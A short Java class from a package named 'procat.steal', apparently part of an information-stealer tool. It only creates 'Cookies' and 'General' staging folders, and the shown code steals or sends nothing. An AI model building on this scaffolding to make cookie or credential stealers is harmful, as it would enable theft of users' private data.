package procat.steal.nodes.file;

import procat.steal.nodes.Category;
import procat.steal.nodes.Node;

import java.io.File;
import java.io.IOException;



public class CreateFile extends Node {

	public CreateFile() {
		super(Category.FILE);
	}

	@Override
	public void createNode() throws IOException {
		File cookiePath = new File(getFolder() + "\\" + "Cookies");
		File generalPath = new File(getFolder() + "\\" + "General");

		if (!cookiePath.exists()) {
			cookiePath.mkdir();
		}

		if (!generalPath.exists()) {
			generalPath.mkdir();
		}
	}
}
